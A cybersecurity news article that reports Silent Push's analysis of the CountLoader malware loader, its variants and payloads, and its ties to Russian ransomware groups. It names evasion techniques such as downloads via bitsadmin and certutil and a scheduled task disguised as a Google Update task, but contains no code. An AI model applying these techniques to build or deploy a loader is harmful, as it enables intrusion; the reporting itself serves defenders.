Cybersecurity researchers have identified a new malware loader, CountLoader, that has been adopted by Russian ransomware operations to carry post-exploitation tools such as Cobalt Strike and AdaptixC2, along with the PureHVNC RAT, according to analysis conducted by Silent Push. The firm described CountLoader as a modular loader used either by Initial Access Brokers or by ransomware affiliates tied to groups including LockBit, Black Basta, and Qilin. Silent Push said the loader has been observed in at least three flavors and is actively deployed in campaigns abroad, including those aimed at Ukraine.
The loader appears in three variants – .NET, PowerShell and JavaScript – with campaigns that targeted individuals in Ukraine using PDF-based phishing lures and impersonating the National Police of Ukraine. The PowerShell variant has been previously noted by researchers as being distributed via DeepSeek-related decoys, a tactic highlighted in prior coverage, though no direct link is provided here to avoid reproducing content from the original article domain.
In addition to its loader capabilities, Silent Push reported the implant BrowserVenom, deployed through CountLoader, which can reconfigure all browsing traffic to route through a proxy controlled by the attackers. The aim is to manipulate network traffic and harvest data for use in subsequent stages of an intrusion.
Among the JavaScript version’s features, CountLoader offers six distinct methods for downloading files, three methods for executing various malware binaries, and a predefined function that can identify a victim’s device based on Windows domain information. The malware also exhibits system information gathering, persistence via a scheduled task that impersonates a Google Update task for the Chrome browser, and the ability to connect to a remote server for further instructions.
Experts note that CountLoader can download and run DLL and MSI payloads using Windows utilities such as rundll32.exe and msiexec.exe, transmit system metadata, and delete created scheduled tasks. The six file-download methods include curl, PowerShell, MSXML2.XMLHTTP, WinHTTP.WinHttpRequest.5.1, bitsadmin and certutil.exe, underscoring an on-the-fly approach to command execution. Silent Push praised the use of LOLBins like certutil and bitsadmin and highlighted a sophisticated command-encryption strategy embedded in the PowerShell generator for on-demand execution. Silent Push noted these traits as indicative of advanced Windows malware development.
A notable aspect of CountLoader is its use of the victim’s Music folder as a staging ground for malware. The .NET variant appears somewhat streamlined, offering only two command types (UpdateType.Zip and UpdateType.Exe) compared with the JavaScript version’s broader capabilities.
The actors behind CountLoader have built an infrastructure of more than 20 unique domains, with the loader serving as a pipeline for Cobalt Strike, AdaptixC2 and PureHVNC RAT. The PureHVNC RAT is a commercial offering associated with an actor known as PureCoder, a link illustrated in broader industry analyses. Context on these relationships is provided in independent research and is complemented by related coverage from Netresec.
Domain-tools researchers have mapped the interconnected nature of the Russian ransomware ecosystem, noting movement across groups and the use of tools such as AnyDesk and Quick Assist. They describe brand allegiance among operators as weak and emphasize that human networks often drive collaboration more than any single malware family. DomainTools Investigations argue that operators adapt quickly to takedowns and rely on trusted relationships when choosing collaborators.
Analysts have also highlighted campaigns tied to the broader Russian-affiliated ransomware landscape, with Check Point describing those behind PureRAT as using a revolving set of GitHub accounts to host files that support PureRAT’s functionality, and employing the ClickFix social engineering tactic to lure victims.